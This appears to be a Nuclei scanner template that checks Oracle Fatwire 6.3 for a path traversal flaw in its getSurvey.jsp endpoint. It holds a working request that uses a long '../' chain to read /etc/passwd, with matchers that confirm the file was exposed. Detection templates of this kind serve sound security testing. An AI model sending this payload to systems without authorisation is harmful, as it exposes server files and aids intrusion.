id: oracle-fatwire-lfi

info:
  name: Oracle Fatwire 6.3 - Path Traversal
  author: Bernardo Rodrigues @bernardofsr
  severity: high
  description: |
    Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
  reference:
    - https://www.exploit-db.com/exploits/50167
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,oracle,fatwire,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100f350835395db58ab328b66bcd546a0a1036a4125edf84d6c5a3f6582acb604d502205acbc1ec39f738f12ec08114db65d79d8933a697b21c3527baf6008d942a1ccf:922c64590222798bb761d5b6d8e72950
